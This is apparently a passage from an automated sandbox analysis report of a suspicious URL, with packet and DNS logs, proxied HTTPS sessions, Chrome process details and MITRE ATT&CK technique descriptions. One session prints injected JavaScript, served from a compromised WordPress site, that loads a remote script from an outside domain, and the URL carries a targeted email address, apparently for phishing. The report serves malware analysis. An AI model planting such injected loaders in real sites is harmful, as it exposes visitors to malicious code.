Apr 23, 2024 22:56:10.050379992 CEST	443	49721	23.1.237.91	192.168.2.5
Apr 23, 2024 22:56:10.050385952 CEST	49721	443	192.168.2.5	23.1.237.91
Apr 23, 2024 22:56:10.050437927 CEST	49721	443	192.168.2.5	23.1.237.91
Apr 23, 2024 22:56:10.057493925 CEST	49721	443	192.168.2.5	23.1.237.91
Apr 23, 2024 22:56:10.057512045 CEST	443	49721	23.1.237.91	192.168.2.5
Apr 23, 2024 22:56:10.057540894 CEST	49721	443	192.168.2.5	23.1.237.91
Apr 23, 2024 22:56:10.057605028 CEST	49721	443	192.168.2.5	23.1.237.91
Apr 23, 2024 22:56:58.023143053 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:56:58.023183107 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:56:58.023260117 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:56:58.023554087 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:56:58.023571968 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:56:58.247936964 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:56:58.248670101 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:56:58.248688936 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:56:58.249783039 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:56:58.275224924 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:56:58.275486946 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:56:58.327698946 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:57:08.256184101 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:57:08.256361961 CEST	443	49728	64.233.185.99	192.168.2.5
Apr 23, 2024 22:57:08.256444931 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:57:08.487545967 CEST	49728	443	192.168.2.5	64.233.185.99
Apr 23, 2024 22:57:08.487565994 CEST	443	49728	64.233.185.99	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 22:55:54.311044931 CEST	53	52249	1.1.1.1	192.168.2.5
Apr 23, 2024 22:55:54.356987000 CEST	53	58547	1.1.1.1	192.168.2.5
Apr 23, 2024 22:55:54.965616941 CEST	53	51103	1.1.1.1	192.168.2.5
Apr 23, 2024 22:55:55.706834078 CEST	53054	53	192.168.2.5	1.1.1.1
Apr 23, 2024 22:55:55.706949949 CEST	53542	53	192.168.2.5	1.1.1.1
Apr 23, 2024 22:55:55.886468887 CEST	53	53542	1.1.1.1	192.168.2.5
Apr 23, 2024 22:55:56.030118942 CEST	53	53054	1.1.1.1	192.168.2.5
Apr 23, 2024 22:55:57.920968056 CEST	56259	53	192.168.2.5	1.1.1.1
Apr 23, 2024 22:55:57.921191931 CEST	63791	53	192.168.2.5	1.1.1.1
Apr 23, 2024 22:55:58.027905941 CEST	53	56259	1.1.1.1	192.168.2.5
Apr 23, 2024 22:55:58.030731916 CEST	53	63791	1.1.1.1	192.168.2.5
Apr 23, 2024 22:56:00.499732018 CEST	61646	53	192.168.2.5	1.1.1.1
Apr 23, 2024 22:56:00.500308990 CEST	49984	53	192.168.2.5	1.1.1.1
Apr 23, 2024 22:56:00.636733055 CEST	53	49984	1.1.1.1	192.168.2.5
Apr 23, 2024 22:56:00.808532953 CEST	53	61646	1.1.1.1	192.168.2.5
Apr 23, 2024 22:56:12.311883926 CEST	53	58812	1.1.1.1	192.168.2.5
Apr 23, 2024 22:56:31.406430960 CEST	53	50525	1.1.1.1	192.168.2.5
Apr 23, 2024 22:56:53.735502005 CEST	53	53876	1.1.1.1	192.168.2.5
Apr 23, 2024 22:56:54.107585907 CEST	53	50534	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 22:55:55.706834078 CEST	192.168.2.5	1.1.1.1	0x576e	Standard query (0)	map.sewoon.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:55.706949949 CEST	192.168.2.5	1.1.1.1	0x87e6	Standard query (0)	map.sewoon.org	65	IN (0x0001)	false
Apr 23, 2024 22:55:57.920968056 CEST	192.168.2.5	1.1.1.1	0x9292	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:57.921191931 CEST	192.168.2.5	1.1.1.1	0x43d9	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 23, 2024 22:56:00.499732018 CEST	192.168.2.5	1.1.1.1	0x998e	Standard query (0)	map.sewoon.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:56:00.500308990 CEST	192.168.2.5	1.1.1.1	0xb3e8	Standard query (0)	map.sewoon.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 22:55:55.886468887 CEST	1.1.1.1	192.168.2.5	0x87e6	No error (0)	map.sewoon.org	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 22:55:56.030118942 CEST	1.1.1.1	192.168.2.5	0x576e	No error (0)	map.sewoon.org	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 22:55:56.030118942 CEST	1.1.1.1	192.168.2.5	0x576e	No error (0)	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com		3.38.76.70	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.027905941 CEST	1.1.1.1	192.168.2.5	0x9292	No error (0)	www.google.com		64.233.185.99	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.027905941 CEST	1.1.1.1	192.168.2.5	0x9292	No error (0)	www.google.com		64.233.185.106	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.027905941 CEST	1.1.1.1	192.168.2.5	0x9292	No error (0)	www.google.com		64.233.185.103	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.027905941 CEST	1.1.1.1	192.168.2.5	0x9292	No error (0)	www.google.com		64.233.185.105	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.027905941 CEST	1.1.1.1	192.168.2.5	0x9292	No error (0)	www.google.com		64.233.185.104	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.027905941 CEST	1.1.1.1	192.168.2.5	0x9292	No error (0)	www.google.com		64.233.185.147	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:55:58.030731916 CEST	1.1.1.1	192.168.2.5	0x43d9	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 23, 2024 22:56:00.636733055 CEST	1.1.1.1	192.168.2.5	0xb3e8	No error (0)	map.sewoon.org	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 22:56:00.808532953 CEST	1.1.1.1	192.168.2.5	0x998e	No error (0)	map.sewoon.org	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 22:56:00.808532953 CEST	1.1.1.1	192.168.2.5	0x998e	No error (0)	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com		3.38.76.70	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:56:09.125914097 CEST	1.1.1.1	192.168.2.5	0x3e76	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 22:56:09.125914097 CEST	1.1.1.1	192.168.2.5	0x3e76	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:56:46.483262062 CEST	1.1.1.1	192.168.2.5	0xfa10	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 23, 2024 22:56:46.483262062 CEST	1.1.1.1	192.168.2.5	0xfa10	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

map.sewoon.org

https:

www.bing.com

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	3.38.76.70	443	6536	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:55:56 UTC	694	OUT	GET /1/themes/es/?cid=alpanesgmj@madrid.es HTTP/1.1 Host: map.sewoon.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-23 20:55:57 UTC	221	IN	HTTP/1.1 404 Not Found Date: Tue, 23 Apr 2024 20:55:57 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1n X-Powered-By: PHP/7.4.21 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-04-23 20:55:57 UTC	138	IN	Data Raw: 37 66 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 6f 66 66 73 65 74 3a 20 31 20 69 6e 20 3c 62 3e 2f 62 69 74 6e 61 6d 69 2f 77 6f 72 64 70 72 65 73 73 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 73 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 33 36 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7f<br /><b>Notice</b>: Undefined offset: 1 in <b>/bitnami/wordpress/wp-content/themes/es/index.php</b> on line <b>36</b><br />0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	3.38.76.70	443	6536	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:55:58 UTC	621	OUT	GET /favicon.ico HTTP/1.1 Host: map.sewoon.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-23 20:55:58 UTC	397	IN	HTTP/1.1 302 Found Date: Tue, 23 Apr 2024 20:55:58 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1n X-Powered-By: PHP/7.4.21 Link: <https://map.sewoon.org/wp-json/>; rel="https://api.w.org/" X-Redirect-By: WordPress Location: https://map.sewoon.org/wp-content/uploads/2021/08/cropped-favicon-32x32.png Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-04-23 20:55:58 UTC	514	IN	Data Raw: 31 66 36 0d 0a 0d 0a 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 09 09 09 09 73 2e 73 72 63 3d 27 2f 2f 62 75 6a 65 72 64 61 7a 2e 63 6f 6d 2f 70 66 65 2f 63 75 72 72 65 6e 74 2f 6d 69 63 72 6f 2e 74 61 67 2e 6d 69 6e 2e 6a 73 3f 7a 3d 35 36 35 30 34 35 36 27 2b 27 26 73 77 3d 2f 73 77 2d 63 68 65 63 6b 2d 70 65 72 6d 69 73 73 69 6f 6e 73 2d 65 32 61 38 62 2e 6a 73 27 3b 0d 0a 09 09 09 09 73 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 75 6c 74 29 20 7b 0d 0a 09 09 09 09 09 73 77 69 74 63 68 20 28 72 65 73 75 6c 74 29 20 7b 0d 0a 09 09 09 09 09 09 63 61 73 65 20 27 6f 6e 50 65 72 6d 69 73 73 69 6f 6e Data Ascii: 1f6<script>var s = document.createElement('script');s.src='//bujerdaz.com/pfe/current/micro.tag.min.js?z=5650456'+'&sw=/sw-check-permissions-e2a8b.js';s.onload = function(result) {switch (result) {case 'onPermission

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	3.38.76.70	443	6536	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:55:59 UTC	662	OUT	GET /wp-content/uploads/2021/08/cropped-favicon-32x32.png HTTP/1.1 Host: map.sewoon.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-23 20:56:00 UTC	262	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 20:55:59 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1n Last-Modified: Fri, 06 Aug 2021 09:18:46 GMT ETag: "58a-5c8e085cc33eb" Accept-Ranges: bytes Content-Length: 1418 Connection: close Content-Type: image/png
2024-04-23 20:56:00 UTC	1418	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 05 51 49 44 41 54 58 c3 a5 97 dd 8f 24 65 15 c6 7f e7 ad aa ee de ee f9 dc 1d 64 c9 ba 86 08 8b bb 18 c2 a2 72 81 98 10 b8 b0 43 62 b2 a8 e1 4a fe 01 b9 ec 3b 88 77 92 18 2f 1c 63 44 12 b2 81 a0 17 0b 1a be 4c 54 32 64 43 50 50 57 9c 05 36 12 d6 f0 e1 c2 b2 3b e3 ac 83 33 d3 55 dd 55 f5 56 d5 7b b8 98 de 9d ee 9e ee 9e 9e e5 4d 3a d5 49 55 3d e7 39 e7 39 5f 25 ec e2 98 f9 79 01 a6 81 2f 01 47 80 83 c0 2c b0 01 2c 03 67 81 73 c0 1a e0 5c a3 b1 23 a6 ec c2 f0 14 70 27 62 be 87 e7 dd 41 e0 7f 41 8d 5f c3 48 19 55 2b 45 11 93 67 ab 14 c5 69 9c fb 3d 70 12 f8 d4 35 1a fa b9 08 98 f9 79 03 1c 41 e4 41 82 d2 7d 5a ad ee d7 ca 1e 83 1f 80 11 10 03 aa e0 1c 14 Data Ascii: PNGIHDR szzQIDATX$edrCbJ;w/cDLT2dCPPW6;3UUV{M:IU=99_%y/G,,gs\#p'bAA_HU+Egi=p5yAA}Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	23.220.189.216	443

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:55:59 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-23 20:55:59 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=36518 Date: Tue, 23 Apr 2024 20:55:59 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	23.220.189.216	443

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:56:00 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-23 20:56:00 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=36455 Date: Tue, 23 Apr 2024 20:56:00 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-23 20:56:00 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49718	3.38.76.70	443	6536	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:56:01 UTC	390	OUT	GET /wp-content/uploads/2021/08/cropped-favicon-32x32.png HTTP/1.1 Host: map.sewoon.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-23 20:56:02 UTC	262	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 20:56:01 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1n Last-Modified: Fri, 06 Aug 2021 09:18:46 GMT ETag: "58a-5c8e085cc33eb" Accept-Ranges: bytes Content-Length: 1418 Connection: close Content-Type: image/png
2024-04-23 20:56:02 UTC	1418	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 05 51 49 44 41 54 58 c3 a5 97 dd 8f 24 65 15 c6 7f e7 ad aa ee de ee f9 dc 1d 64 c9 ba 86 08 8b bb 18 c2 a2 72 81 98 10 b8 b0 43 62 b2 a8 e1 4a fe 01 b9 ec 3b 88 77 92 18 2f 1c 63 44 12 b2 81 a0 17 0b 1a be 4c 54 32 64 43 50 50 57 9c 05 36 12 d6 f0 e1 c2 b2 3b e3 ac 83 33 d3 55 dd 55 f5 56 d5 7b b8 98 de 9d ee 9e ee 9e 9e e5 4d 3a d5 49 55 3d e7 39 e7 39 5f 25 ec e2 98 f9 79 01 a6 81 2f 01 47 80 83 c0 2c b0 01 2c 03 67 81 73 c0 1a e0 5c a3 b1 23 a6 ec c2 f0 14 70 27 62 be 87 e7 dd 41 e0 7f 41 8d 5f c3 48 19 55 2b 45 11 93 67 ab 14 c5 69 9c fb 3d 70 12 f8 d4 35 1a fa b9 08 98 f9 79 03 1c 41 e4 41 82 d2 7d 5a ad ee d7 ca 1e 83 1f 80 11 10 03 aa e0 1c 14 Data Ascii: PNGIHDR szzQIDATX$edrCbJ;w/cDLT2dCPPW6;3UUV{M:IU=99_%y/G,,gs\#p'bAA_HU+Egi=p5yAA}Z

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49721	23.1.237.91	443

Timestamp	Bytes transferred	Direction	Data
2024-04-23 20:56:09 UTC	2148	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900D492 X-BM-CBT: 1696428841 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900D492 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 2484 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1713905737943&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-04-23 20:56:09 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-04-23 20:56:09 UTC	2483	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-04-23 20:56:10 UTC	478	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: D8B1613454CE44FCB8639383792F0655 Ref B: LAX311000109023 Ref C: 2024-04-23T20:56:09Z Date: Tue, 23 Apr 2024 20:56:09 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.57ed0117.1713905769.20d4f1

Target ID:	0
Start time:	22:55:49
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	22:55:51
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2524,i,8810008252200331664,4950474345356171271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	22:55:54
Start date:	23/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
